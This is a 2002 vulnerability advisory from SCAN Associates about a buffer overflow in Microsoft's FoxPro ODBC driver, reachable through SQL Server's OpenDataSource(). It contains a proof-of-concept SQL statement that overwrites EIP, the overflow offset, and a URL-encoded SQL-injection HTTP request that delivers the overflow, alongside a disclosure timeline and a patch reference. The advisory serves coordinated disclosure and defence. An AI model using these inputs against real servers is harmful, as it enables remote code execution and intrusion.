[VulnWatch] SCAN Associates Advisory: FoxPro ODBC Driver Buffer Overflow

From: sk (sk@scan-associates.net)
Date: 10/04/02 

From: "sk" <sk@scan-associates.net>
To: <vulnwatch@vulnwatch.org>, <bugtraq@securityfocus.com>
Date: Fri, 4 Oct 2002 12:13:44 +0800

SCAN Associates Advisory : FoxPro ODBC Driver Buffer Overflow
=============================================================

Products: Microsoft SQL Server 7.0 and 2000, all Service Packs
Date: 6th August 2002
Summary: FoxPro ODBC Driver Buffer Overflow via SQL OpenDataSource()
Author: sk@scan-associates.net
Contributors: pokleyzz <pokleyzz@scan-associates.net>,
shaharil@scan-associates.net

Description
===========
We found an exploitable buffer overflow using OpenDataSource function in
Microsoft SQL Server when we are connecting to "Microsoft Visual FoxPro
Driver". We have successfully exploited this vulnerability in the last Capture the Flag event in Malaysia and won the competition for the second time.

Details
=======
Using a very long SourceDB, we can overwrite EIP register with any value.
The EIP will be overwritten at 276 bytes from SourceDB.

SELECT * FROM OpenDataSource( 'MSDASQL','Driver=Microsoft Visual FoxPro
Driver;SourceDB=e:\AAA...269...AAA<EIP>;SourceType=DBC')...xactions;

The following statement will cause EIP point to 0x42424242 which will cause
Access Voilation.

SELECT *
FROM OpenDataSource( 'MSDASQL','Driver=Microsoft Visual FoxPro
Driver;SourceDB=e:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB;SourceType=
DBC')...xactions

If you are executing the statement via Query Analyzer, you will recieve
"EXCEPTION_ACCESS_VIOLATION" error. You may start WinDbg to attach SQL Server process first, before executing the statement to verify that EIP was overwritten with 0x42424242 (BBBB).

Using a small payload of about 190 bytes, we can upload any file into the server to be executed with previllege of the SQL Server (usually SYSTEM). It is also relatively easy to attack via SQL injection. So, even a Database behind a NAT can reverse telnet to us:

GET
/id.asp?id='a';SELECT%20*%20FROM%20OpenDataSource(%20'MSDASQL','Driver%3dMic
rosoft%20Visual%20FoxPro%20Driver;SourceDB%3de:\AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBB;SourceType%3dDBC')...xactions HTTP/1.0

The problem lies in FoxPro ODBC driver, so, any products that allow access to ODBC driver are vulnerable as well.

Solution
======

http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-056.asp

Vendor Response
===============
6th July 2002 : Alerted Microsoft.
13th July 2002 : Microsoft confirmed problem in FoxPro driver and will
release a patch.
25th September 2002 : Microsoft will release a bulletin
4th October 2002: Patch available to public

Discovery: pokleyzz@scan-associates.net
Exploit: sk@scan-associates.net

Links
=====
1. Win32 Buffer Overflow Walkthrough -
http://www.scan-associates.net/papers/win32_bo_walkthrough.txt

2. SQL Injection Walkthrough -

http://www.scan-associates.net/papers/sql_injection_walkthrough.txt

Greetz to: =da scan clan= , wyse, spoonfork, wanvadder, Alphaque, L33tdawg, Mnemonix, Mark Litchfield, b0iler@#vuln, Saumil Shah, nullbyte, syscalls, mycert team, and everyone else who know us.

Regards,

sk
Scan Associates Sdn Bhd, Malaysia
www.scan-associates.net